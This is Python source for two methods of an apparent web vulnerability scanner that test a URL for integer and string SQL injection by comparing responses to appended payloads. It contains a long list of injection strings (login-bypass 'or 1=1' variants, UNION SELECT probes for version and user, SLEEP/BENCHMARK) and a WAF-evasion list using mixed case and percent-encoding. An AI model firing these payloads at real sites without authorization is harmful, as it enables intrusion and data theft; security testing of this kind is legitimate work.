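    def Integer_sqlinj_scan(self, *, timeout=None):
        """Boolean-style probe for integer (unquoted) SQL injection at self.url.

        Three pages are compared: the untouched URL, the URL with ``+1``
        appended and the URL with ``+1-1`` appended.  If the ``+1-1`` page
        matches the baseline while the ``+1`` page differs, the appended
        arithmetic was evidently evaluated server-side and the URL is
        reported as injectable.  Both a body hash (md5_encrypt) and the
        DOM.check() result are compared; either signal is enough.

        Assumes self.url ends in the numeric parameter value under test
        (e.g. ``...?id=1``), because the probes are appended verbatim.
        ``urlencode`` is the module-level helper used throughout this file;
        urllib.parse.urlencode() rejects a bare string, so this is
        presumably a quoting wrapper — confirm.

        Args:
            timeout: optional per-request timeout handed to requests.get();
                None keeps the library default (wait indefinitely).

        Returns:
            self.url when the differential check fires, otherwise 0.  Any
            transport/parsing failure is printed and also yields 0, so a 0
            means "not detected", not "proven safe".
        """
        probes = (
            self.url,
            self.url + urlencode('+1'),
            self.url + urlencode('+1-1'),
        )
        try:
            # Hash all three bodies first, then run the DOM checks, keeping
            # the original request order (md5 fetches, then DOM fetches).
            digests = [
                md5_encrypt(
                    requests.get(url=u, headers=HEADER, timeout=timeout).text)
                for u in probes
            ]
            doms = [DOM.check(u) for u in probes]
        except Exception as e:
            # The previous version left the DOM results unbound here and then
            # died with NameError on the comparison; report "not detected"
            # instead so a flaky target does not abort the whole scan.
            print(e)
            return 0

        base_md5, plus_md5, neutral_md5 = digests
        base_dom, plus_dom, neutral_dom = doms
        # "+1-1" must reproduce the baseline and "+1" must not.
        md5_hit = base_md5 == neutral_md5 and base_md5 != plus_md5
        dom_hit = base_dom == neutral_dom and base_dom != plus_dom
        if dom_hit or md5_hit:
            return self.url
        return 0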
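    def Str_sqlinj_scan(self, waf, *, timeout=None):
        """Boolean-style probe for string (quoted) SQL injection at self.url.

        For each quote prefix (``'``, ``"`` and none) ten rounds are run.
        Each round appends one payload drawn from a "false" list (p0) and
        one from a "true" list (p1) to self.url and fetches three pages:
        baseline, baseline+p0 and baseline+p1.  The URL is reported as
        injectable when the p1 page matches the baseline while the p0 page
        differs, judged either by a body hash (md5_encrypt) or by
        DOM.check().

        Payload selection depends on ``waf``: when ``waf.cget("text")`` is
        exactly ``'WAF:None'`` the plain lists are used, otherwise the
        case-mixed / percent-encoded evasion list.  ``waf`` is presumably a
        Tk label — confirm; its text is read once, before the loop.

        NOTE(review): only the first four entries of the plain lists form a
        real ``and 0`` / ``and 1`` pair, and p0/p1 are drawn independently,
        so most rounds compare two unrelated payloads rather than a boolean
        pair; the evasion branch uses one and the same list for both sides.
        The SLEEP()/BENCHMARK() entries are time-based probes, but this
        method never measures latency, so they only slow the scan down.

        Assumes self.url ends in the parameter value under test, since the
        payload is appended verbatim through ``urlencode`` (a module-level
        helper; urllib.parse.urlencode() would reject a bare string, so it
        is presumably a quoting wrapper — confirm).

        Args:
            waf: object exposing ``cget("text")`` with the WAF-detection label.
            timeout: optional per-request timeout handed to requests.get();
                None keeps the library default (wait indefinitely).

        Returns:
            ``"<p0>~<url>"`` for the first round that fires, otherwise 0.
            A round whose fetch fails is printed and skipped, so 0 means
            "not detected", not "proven safe".
        """
        quotes = ['\'', '"', '']

        # Payloads shared by the "false" and "true" plain lists.  The two
        # lists only differ in their first four entries (``and 0``/``and 1``).
        common_payloads = [
            "\'-\'",
            "\' \'",
            "\'&\'",
            "\'^\'",
            "\'*\'",
            "\' or \'\'-\'",
            "\' or \'\' \'",
            "\' or \'\'&\'",
            "\' or \'\'^\'",
            "\' or \'\'*\'",
            "\"-\"",
            "\" \"",
            "\"&\"",
            "\"^\"",
            "\"*\"",
            "\" or \"\"-\"",
            "\" or \"\" \"",
            "\" or \"\"&\"",
            "\" or \"\"^\"",
            "\" or \"\"*\"",
            "or true--",
            "\" or true--",
            "\' or true--",
            "\") or true--",
            "\') or true--",
            "\' or \'x\'=\'x",
            "\') or (\'x\')=(\'x",
            "\')) or ((\'x\'))=((\'x",
            "\" or \"x\"=\"x",
            "\") or (\"x\")=(\"x",
            "\")) or ((\"x\"))=((\"x",
            "or 1=1",
            "or 1=1--",
            "or 1=1#",
            "or 1=1/*",
            "admin\' --",
            "admin\' #",
            "admin\'/*",
            "admin\' or \'1\'=\'1",
            "admin\' or \'1\'=\'1\'--",
            "admin\' or \'1\'=\'1\'#",
            "admin\' or \'1\'=\'1\'/*",
            "admin\'or 1=1 or \'\'=\'",
            "admin\' or 1=1",
            "admin\' or 1=1--",
            "admin\' or 1=1#",
            "admin\' or 1=1/*",
            "admin\') or (\'1\'=\'1",
            "admin\') or (\'1\'=\'1\'--",
            "admin\') or (\'1\'=\'1\'#",
            "admin\') or (\'1\'=\'1\'/*",
            "admin\') or \'1\'=\'1",
            "admin\') or \'1\'=\'1\'--",
            "admin\') or \'1\'=\'1\'#",
            "admin\') or \'1\'=\'1\'/*",
            "1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
            "admin\" --",
            "admin\" #",
            "admin\"/*",
            "admin\" or \"1\"=\"1",
            "admin\" or \"1\"=\"1\"--",
            "admin\" or \"1\"=\"1\"#",
            "admin\" or \"1\"=\"1\"/*",
            "admin\"or 1=1 or \"\"=\"",
            "admin\" or 1=1",
            "admin\" or 1=1--",
            "admin\" or 1=1#",
            "admin\" or 1=1/*",
            "admin\") or (\"1\"=\"1",
            "admin\") or (\"1\"=\"1\"--",
            "admin\") or (\"1\"=\"1\"#",
            "admin\") or (\"1\"=\"1\"/*",
            "admin\") or \"1\"=\"1",
            "admin\") or \"1\"=\"1\"--",
            "admin\") or \"1\"=\"1\"#",
            "admin\") or \"1\"=\"1\"/*",
            # Double-quoted twin of the entry above; the hash is md5("1234")
            # in full (the earlier copy had lost its last hex digit, and the
            # "true" list had lost the whole tail to a missing comma that
            # silently glued it onto the next payload).
            "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055\"",
            " UNION ALL SELECT 1,2,3,4",
            " UNION ALL SELECT 1,2,3,4,5-- ",
            " UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
            " UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
            " AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
            " UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
            " RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
        ]
        # "false" side: the condition evaluates to 0.
        payload_false = [
            " and 0;-- ",
            "/**/and/**/0;#",
            "\tand\t0;#",
            "\nand/**/0;#",
        ] + common_payloads
        # "true" side: the condition evaluates to 1.
        payload_true = [
            " and 1;-- ",
            "/**/and/**/1;#",
            "\tand\t1;#",
            "\nand/**/1;#",
        ] + common_payloads
        # WAF-evasion variants (mixed case, percent-encoding, chr() and
        # keyword-splitting).  The original carried two byte-identical
        # copies of this list for the two sides; one copy serves both.
        payload_waf = [
            " And 0;-- ",
            "/**/And/**/0;#",
            "\tAnd\t0;#",
            "\nAnd/**/0;#",
            " Union All Select 1,2,3,4",
            " Union All Select 1,2,3,4,5-- ",
            " Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
            " Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
            " And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
            " Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
            " Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
            " And%200;--",
            " Union%20All%20Select%201,2,3,4",
            " Union%20All%20Select%201,2,3,4,5--",
            " Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
            " Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
            " And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
            " Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
            " Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
            " chr(97)+chr(110)+chr(100) 0;-- ",
            " aandNandd 0;-- ",
        ]

        if waf.cget("text") == 'WAF:None':
            false_set, true_set = payload_false, payload_true
        else:
            false_set, true_set = payload_waf, payload_waf

        for quote in quotes:
            for _ in range(10):
                # random.choice replaces the fixed randint(0, 85), which
                # skipped the last entries of the plain lists and raised
                # IndexError most of the time on the 21-entry evasion list.
                p0 = quote + random.choice(false_set)
                p1 = quote + random.choice(true_set)
                probes = (
                    self.url,
                    self.url + urlencode(p0),
                    self.url + urlencode(p1),
                )
                try:
                    # md5 fetches first, then DOM checks, as before.
                    digests = [
                        md5_encrypt(
                            requests.get(url=u, headers=HEADER,
                                         timeout=timeout).text)
                        for u in probes
                    ]
                    doms = [DOM.check(u) for u in probes]
                except Exception as e:
                    # A failed round used to leave the DOM results unbound
                    # (NameError on the very first round) or stale; skip it.
                    print(e)
                    continue

                base_md5, false_md5, true_md5 = digests
                base_dom, false_dom, true_dom = doms
                # p1 (true) must reproduce the baseline and p0 (false) must not.
                md5_hit = base_md5 == true_md5 and base_md5 != false_md5
                dom_hit = base_dom == true_dom and base_dom != false_dom
                if dom_hit or md5_hit:
                    return p0 + "~" + self.url
        return 0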